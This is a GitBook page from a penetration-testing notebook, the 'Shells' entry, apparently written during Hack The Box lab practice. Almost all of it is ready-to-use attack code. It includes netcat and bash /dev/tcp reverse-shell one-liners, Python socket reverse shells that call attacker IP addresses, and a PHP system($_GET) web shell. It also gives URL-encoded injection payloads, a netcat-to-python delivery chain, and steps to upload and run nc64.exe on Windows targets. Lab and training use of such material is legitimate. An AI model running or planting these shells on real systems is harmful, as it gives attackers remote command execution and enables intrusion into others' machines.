Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Links
  • Basics
  • Easy Test Connect
  • PHP web shell
  • Python
  • Bash Reverse
  • Powershell Reverse
  • netcat
  • Windows netcat

Was this helpful?

  1. 03 Getting In

Shells

Broad Topic

PreviousPowerShell EmpireNextrpc

Last updated 2 years ago

Was this helpful?

Links

  • Web

  • Gitbook

Basics

  • Host: Setup the listener to catch the reverse shell

    • nc -nvlp 1234

  • Target: Upload your reverse shell, navigate, execute, connect

  • Example: BashedHTB sends a php reverse shell with wget

Easy Test Connect

nc -e /bin/bash $IP 4444
netcat -e /bin/bash $MyIP 4444
bash -i >& /dev/tcp/$MyIP/4444 0>&1

nc -nlvp 4444

PHP web shell

  • Upload this simple 'shell.php', and call it using parameter 'cmd=uname'

  • Consider, you might need to send 'shell.php3' to avoid the block/filter.

<?php
  system($_GET["cmd"]);
?>

Execute:
http://abc.so/upload/shell.php?cmd=uname -a

Python

#!/usr/bin/env python
import os
import sys
try: 
    #os.system('/usr/bin/touch /tmp/hello')              ...test
    #os.system('bash -i /dev/tcp/$MyIP/4444 0>&1')       ...reverse shell
    os.system('chmod 4755 /bin/dash')                    ...rootbash
except:
    sys.exit()
This worked for htb-bashed:
Root process auto-executes python scripts:

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.15",5555))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);
Script:
http://10.10.10.168:8080/

import socket,subprocess,os bs; 
socket.socket(socket.AF_INET,socket.SOCK_STREAM);
ns.connect(("10.10.15.30",51000));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
import pty;
pty.spawn("/bin/bash")# 
HTTP/1.1



Bash Script/Shell (privesc)

#!/usr/bin/python
import socket
import subprocess
import os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.52",8080))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

By Burp

Readable:
/'\nimport socket,subprocess,os;\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM);\ns.connect((\"10.10.15.30\",51000));\nos.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);\nimport pty;\npty.spawn(\"/bin/bash\")#

Web-Encoded:
/'%0Aimport%20socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.15.30",51000))%3bos.dup2(s.fileno(),0)%3bos.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport%20pty%3bpty.spawn("/bin/bash")%23 HTTP/1.1

Browser

http://10.10.10.168:8080/'%0Aimport%20socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.15.30",51000))%3bos.dup2(s.fileno(),0)%3bos.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport%20pty%3bpty.spawn("/bin/bash")%23 HTTP/1.1
--Remember to include the HTTP/1.1

Bash Reverse

bash -i >& /dev/tcp/192.168.1.26/53 0>&1

payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'

Powershell Reverse

netcat

  • Create a python reverse shell

  • Listener #1: Share rshell with <

  • Listener #2: Wait for incoming

  • LFI: Execute nc to pickup rshell and execute it

rce > nc > python > nc/rshell

Python Reverse Shell
vim cmd  ..connect(("10.10.14.6",1234))
nc -nvlp 9001 < cmd   ..send/share the file
nc -nvlp 1234         ..catch shell
..queues;nc+10.10.10.6+9001|python+&   ..fail
..queues;nc+10.10.10.6+9001|python     ..ok pull file, python execute
connected!

Windows netcat

  • Windows Target might not have netcat

  • Download and send the nc64.exe (assuming they are using 64bit)

Download 64-bit netcat
nc64.exe: upload and execute

http://10.x.x.x/ippsec.php?fupload=nc64.exe
http://10.x.x.x/ippsec.php?fexec=nc64.exe -e cmd $MyIP 8081
nc -nvlp 8081

REF: ,

REF:

Execute your nc64.exe to send a ReverseShellback to yourself

Ex:

gtfobins.github.io
PentestMonkey.net_ReverseShells
Reverse Shell Generator: Suggestion Tool
Reverse-shells-one-liners
http://rhost/404.php
PhpTricks
FtpHttpVuln
FtpHttpVulnWebshell
ApacheJamesEmail
PrivEscVenom
MetasploitVenom
WindowsPrivEsc-Powershell
DrupalPhpVuln